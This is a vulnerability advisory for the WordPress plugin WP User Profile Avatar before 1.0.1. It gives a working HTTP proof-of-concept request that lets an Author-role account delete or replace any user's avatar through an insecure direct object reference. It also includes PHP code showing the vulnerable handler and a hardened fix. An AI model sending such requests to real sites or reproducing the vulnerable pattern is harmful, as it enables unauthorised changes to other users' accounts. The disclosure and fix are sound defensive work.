WordPress Plugin Vulnerabilities

WP User Profile Avatar < 1.0.1 - Author+ Avatar Deletion/Update via IDOR

Description

The plugin does not properly check for authorisation in its avatar AJAX handlers: any user with the Author role (or higher) can delete or replace the avatar of an arbitrary user by supplying the victim's user ID in the request (user_id=1 in the PoC below), which is an Insecure Direct Object Reference.

Proof of Concept

PoC request (sent from an account with the Author role):

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849
Content-Length: 472
Origin: http://your_site
DNT: 1
Connection: close
Referer: http://your_site/wordpress/?p=873
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="action"

remove_user_avatar
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="form_data"

wpupa_url=&wpupa_attachment_id=875&user_id=1
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="security"

3f855e1991
-----------------------------49182745140183315063494246849--

The request above is sent with the session cookie of an Author account and removes the avatar of the user whose ID is given in form_data (here user_id=1). Setting the action to update_user_avatar instead, with the same form_data fields, replaces that user's avatar with the attachment given in wpupa_attachment_id. The security field carries the plugin's AJAX nonce: a nonce only shows that the request originated from a logged-in user's page, it is not an authorisation check on user_id, and nothing in the handler verifies that the current user is allowed to edit the targeted user, so any Author can target any user ID.

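To make the bug class concrete, the following is an added example and not the plugin's code (the plugin source is not on this page): it reconstructs the handler pattern that produces this IDOR, with the nonce verified but the client-supplied user_id trusted, and then shows a hardened version that authorises the caller against the target user. The AJAX action names and the form_data fields are taken from the PoC request; the nonce action name 'wpupa_nonce', the user-meta key 'wpupa_attachment_id' and all function names are assumptions.

```php
<?php
/**
 * Added example, not the plugin's code. Reconstructs the vulnerable handler
 * pattern behind the PoC above and a hardened version of it.
 * Assumed names: nonce action 'wpupa_nonce', user-meta key
 * 'wpupa_attachment_id', and every function name below. The AJAX actions
 * (remove_user_avatar / update_user_avatar) and the form_data fields
 * (wpupa_url, wpupa_attachment_id, user_id) come from the PoC request.
 */

// Parse the URL-encoded "form_data" field exactly as the PoC sends it:
// "wpupa_url=&wpupa_attachment_id=875&user_id=1"
function example_parse_form_data() {
    $raw = isset( $_POST['form_data'] ) ? wp_unslash( $_POST['form_data'] ) : '';
    parse_str( $raw, $form );
    return is_array( $form ) ? $form : array();
}

/* ---- Vulnerable pattern: nonce check only, user_id trusted from the client ---- */

add_action( 'wp_ajax_remove_user_avatar', 'example_remove_user_avatar_vulnerable' );
function example_remove_user_avatar_vulnerable() {
    // A valid nonce proves the request came from a logged-in user's page,
    // and every logged-in user who can load that page receives one. It says
    // nothing about whether *this* user may act on $user_id.
    check_ajax_referer( 'wpupa_nonce', 'security' );

    $form    = example_parse_form_data();
    $user_id = (int) ( $form['user_id'] ?? 0 );    // attacker-controlled

    delete_user_meta( $user_id, 'wpupa_attachment_id' ); // IDOR: no ownership/capability check
    wp_send_json_success();
}

/* ---- Hardened version: authorise against the target user, not just the nonce ---- */

// Resolve the target user and stop the request unless the caller may edit that user.
function example_target_user_or_die( array $form ) {
    // Default to the caller; only honour a supplied user_id if the caller is
    // allowed to edit that account. 'edit_user' is a meta capability that
    // map_meta_cap() grants for your own account and otherwise only to users
    // holding edit_users (administrators), so an Author cannot target user 1.
    $user_id = isset( $form['user_id'] ) ? absint( $form['user_id'] ) : get_current_user_id();

    if ( ! $user_id || ! current_user_can( 'edit_user', $user_id ) ) {
        wp_send_json_error( 'You are not allowed to change this user\'s avatar.', 403 ); // calls wp_die()
    }
    return $user_id;
}

add_action( 'wp_ajax_remove_user_avatar', 'example_remove_user_avatar_fixed' );
function example_remove_user_avatar_fixed() {
    check_ajax_referer( 'wpupa_nonce', 'security' );

    $user_id = example_target_user_or_die( example_parse_form_data() );

    delete_user_meta( $user_id, 'wpupa_attachment_id' );
    wp_send_json_success( array( 'user_id' => $user_id ) );
}

add_action( 'wp_ajax_update_user_avatar', 'example_update_user_avatar_fixed' );
function example_update_user_avatar_fixed() {
    check_ajax_referer( 'wpupa_nonce', 'security' );

    $form          = example_parse_form_data();
    $user_id       = example_target_user_or_die( $form );
    $attachment_id = absint( $form['wpupa_attachment_id'] ?? 0 );

    // The attachment ID is also client-controlled: confirm it is a real image
    // attachment before storing it as someone's avatar.
    if ( ! $attachment_id
        || 'attachment' !== get_post_type( $attachment_id )
        || ! wp_attachment_is_image( $attachment_id ) ) {
        wp_send_json_error( 'Invalid attachment.', 400 );
    }

    update_user_meta( $user_id, 'wpupa_attachment_id', $attachment_id );
    wp_send_json_success( array( 'user_id' => $user_id, 'attachment_id' => $attachment_id ) );
}
```

The essential change is the current_user_can( 'edit_user', $user_id ) check: with it in place, the PoC request from an Author session receives a 403 JSON error for user_id=1, while a user editing their own avatar (or an administrator editing anyone's) continues to work. Registering the vulnerable and fixed callbacks on the same hook, as done above for illustration, is not what a real plugin should do; in practice only the hardened handler would be registered.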
Classification

Type
IDOR

Miscellaneous

Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Verified
Yes

Timeline

Publicly Published
2023-12-29
Added
2023-12-29
Last Updated
2024-01-10
